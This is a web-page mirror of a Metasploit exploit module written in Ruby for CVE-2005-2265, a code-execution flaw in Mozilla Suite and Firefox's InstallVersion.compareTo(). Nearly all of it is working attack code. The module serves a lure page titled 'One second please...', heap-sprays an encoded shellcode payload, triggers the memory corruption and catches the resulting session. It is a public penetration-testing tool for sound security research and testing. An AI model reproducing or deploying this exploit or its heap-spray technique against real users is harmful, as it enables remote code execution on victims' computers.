Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/mozilla_compareto.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  # include Msf::Exploit::Remote::BrowserAutopwn

15
  # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10

16
  # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.

17
  # autopwn_info({

18
  #  :ua_name => HttpClients::FF,

19
  #  :ua_minver => "1.0",

20
  #  :ua_maxver => "1.7.10",

21
  #  :os_name => OperatingSystems::Match::WINDOWS,

22
  #  :javascript => true,

23
  #  :rank => NormalRanking, # reliable memory corruption

24
  #  :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",

25
  # })

26


27
  def initialize(info = {})

28
    super(

29
      update_info(

30
        info,

31
        'Name' => 'Mozilla Suite/Firefox compareTo() Code Execution',

32
        'Description' => %q{

33
          This module exploits a code execution vulnerability in the Mozilla

34
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit

35
          module is a direct port of Aviv Raff's HTML PoC.

36
        },

37
        'License' => MSF_LICENSE,

38
        'Author' => ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],

39
        'References' => [

40
          ['CVE', '2005-2265'],

41
          ['OSVDB', '17968'],

42
          ['BID', '14242'],

43
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],

44
        ],

45
        'Payload' => {

46
          'Space' => 400,

47
          'BadChars' => "\x00",

48
        },

49
        'Platform' => %w{win},

50
        'Targets' => [

51
          # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on

52
          # WinXP-SP3 and Win2kAS-SP0

53
          [

54
            'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',

55
            {

56
              'Platform' => 'win',

57
              'Arch' => ARCH_X86,

58
              'Ret' => 0x0c0c0c0c,

59
            }

60
          ],

61
        ],

62
        'DefaultTarget' => 0,

63
        'DisclosureDate' => '2005-07-13',

64
        'Notes' => {

65
          'Reliability' => UNKNOWN_RELIABILITY,

66
          'Stability' => UNKNOWN_STABILITY,

67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

68
        }

69
      )

70
    )

71
  end

72


73
  def on_request_uri(cli, request)

74
    # Re-generate the payload

75
    return if ((p = regenerate_payload(cli)) == nil)

76


77
    print_status("Sending #{self.name}")

78
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

79


80
    # Handle the payload

81
    handler(cli)

82
  end

83


84
  def generate_html(payload)

85
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

86
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

87


88
    spray_to = sprintf("0x%.8x", target.ret)

89
    spray_slide1 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))

90
    spray_slide2 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))

91
    eax_address = sprintf("0x%.8x", target.ret)

92


93
    return %Q|

94
<html>

95
<head>

96
<!--

97
  Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)

98
  From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx

99
  Greets: SkyLined, The Insider and shutdown

100
-->

101
  <title>One second please...</title>

102
  <script language="javascript">

103


104
    function BodyOnLoad()

105
    {

106
      location.href="javascript:void (new InstallVersion());";

107
      CrashAndBurn();

108
    };

109


110
    #{js_heap_spray}

111
    // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology

112
    function CrashAndBurn()

113
    {

114
      // Payload - Just return..

115
      var payLoadCode=unescape("#{enc_code}");

116


117
      // Size of the heap blocks

118
      var heapBlockSize=0x400000;

119
      sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));

120


121
      // Set address to fake "pdata".

122
      var eaxAddress = #{eax_address};

123


124
      //	This was taken from shutdown's PoC in bugzilla

125
      // struct vtbl { void (*code)(void); };

126
      // struct data { struct vtbl *pvtbl; };

127
      //

128
      // struct data *pdata = (struct data *)(xxAddress & ~0x01);

129
      // pdata->pvtbl->code(pdata);

130
      //

131
      (new InstallVersion).compareTo(new Number(eaxAddress >> 1));

132
    }

133
// -->

134
  </script>

135
</head>

136
<body onload="BodyOnLoad()">

137
</body>

138
</html>

139
    |

140
  end

141
end

142


143